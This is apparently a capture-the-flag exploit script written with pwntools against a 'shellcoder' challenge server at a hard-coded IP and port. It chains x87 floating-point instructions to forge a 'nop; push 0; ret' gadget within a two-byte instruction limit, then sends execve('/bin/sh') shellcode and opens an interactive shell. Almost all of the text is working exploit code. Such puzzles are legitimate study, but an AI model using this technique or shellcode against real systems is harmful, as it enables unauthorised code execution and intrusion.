lol

shellcoder.py

from pwn import process, p64, asm, context, gdb, remote

context.arch = 'amd64'
context.terminal = ['tmux', 'splitw', '-h']

# r = process('./shellcoder', aslr=False)
r = remote('3.38.149.80', 20001)

'''
https://gregstoll.com/~gregstoll/floattohex/
nop; push 0; ret
0xc3006a9000000000 = -577595791900672.0

http://factordb.com/index.php?query=577595791900672
577595791900672<15> = 2^33 · 19 · 3539
2 ** 33 == (16*16)**4 * 2
'''

pp = '''
# init
fld1
fld1
fld1
fld1
fld1
fld1
fld1
fld1

fadd 0 1
fmul 0 1
fmul 2 0 # save 2 to st2
fmul 0 0

fmul 0 0 # st0 = 16
fmul 0 0 # st0 = 16

fmul 3 0 # 3 = 256
fmul 0 3
fmul 0 3
fmul 0 3
fmul 0 2 # 0 == 2**33

fmul 7 0 # 7 = 2**33

#####

fcmove 0 2
fmul 4 0
fmul 4 0
fmul 5 0
fmul 5 0
fmul 5 0

fadd 0 5
fadd 0 4
fmul 0 3
fmul 1 0 # st0=3584

fcmove 0 3
fdiv 0 4
fsub 0 5
fsub 0 5

fsub 0 2
fsub 0 6

fsub 1 0

fcmove 0 1

fmul 7 0

fcmove 0 5
fadd 0 5
fadd 0 2
fadd 0 6

fmul 7 0
fsub 0 0
fsub 0 7
'''.strip().split('\n')

#  context.log_level = 'debug'

for p in pp:
    p = p.split('#')[0].strip()
    if p.strip() == '':
        continue
    try:
        op, o1, o2 = p.strip().split(' ')
        p = f"{op} st({o1}), st({o2})"
    except:
        p = p
    finally:
        print(p)
    p = asm(p).hex()
    assert len(p) == 4, "NOPE: " + p
    r.sendlineafter(b': ', ('0000' + p).encode())

sc = '''
b *0x00005555555557b6
i r st0
i r st1
i r st2
i r st3
i r st4
i r st5
i r st6
i r st7
c
'''.strip()

if False:
    gdb.attach(r, sc)

sc = '''
mov rax, 0x0068732f6e69622f
push rax
mov rdi, rsp
push 0
mov rsi, rsp
push rsp
xor rdx, rdx
push 0x3b
pop rax
syscall
'''

# dd10 = fst qword ptr [rax]
r.sendlineafter(b': ', (asm(sc).hex()+'dd10').encode())
r.interactive()